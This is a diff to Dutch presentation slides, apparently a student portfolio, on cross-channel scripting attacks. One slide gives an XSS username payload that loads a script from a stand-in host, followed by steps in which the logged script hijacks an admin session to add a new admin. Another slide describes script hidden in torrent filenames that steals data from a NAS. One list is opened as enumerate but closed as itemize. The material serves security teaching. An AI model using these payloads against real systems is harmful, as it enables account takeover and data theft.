Portfolio xcs: some final changes.

portfolio/xcs/xcs.tex

@@ -128,14 +128,18 @@ doelwit   <-       HTTP       <- web service
     Een logbestand wordt remote bekeken door een administrator. Kunnen we iets
     loggen wat op dat moment wordt uitgevoerd?
 
-    \begin{itemize}
+    \begin{enumerate}
         \item
-        Probeer in te loggen met username:
+        Probeer in te loggen met gebruikersnaam:
         \begin{verbatim}
 r","","");\\/--></script>
 <script src="http://xxx"></script>
         \end{verbatim}
-    \end{itemize}
+        Gebruikersnaam is incorrect, maar wordt wel gelogd
+        \item Admin logt in en bekijkt het logbestand, script wordt uitgevoerd
+        \item Script heeft beschikking over admin's sessie en voegt een nieuwe
+              admin toe
+    \end{enumerate}
 }
 
 \frame
@@ -171,11 +175,13 @@ aanvaller ->       HTTP       -> web service
     NAS download torrent van een webserver, de bestandsnamen in de torrent
     bevatten een script.
 
-	\begin{itemize}
+    \begin{enumerate}
 		\item Torrent bevat lijst van bestanden $\rightarrow$ verspreid script
 		      over meerdere bestandsnamen
-	    \item Script wordt uitgevoerd op NAS, bijv. seeden van torrents of
-	          stelen van data
+		\item Gebruiker bezoekt torrent service van NAS en download de torrent
+		\item Torrent informatie en bestandslijst worden gelezen, script wordt
+		      uitgevoerd
+        \item Script kan nu bijv. torrents seeden of stelen van data
 	\end{itemize}
 }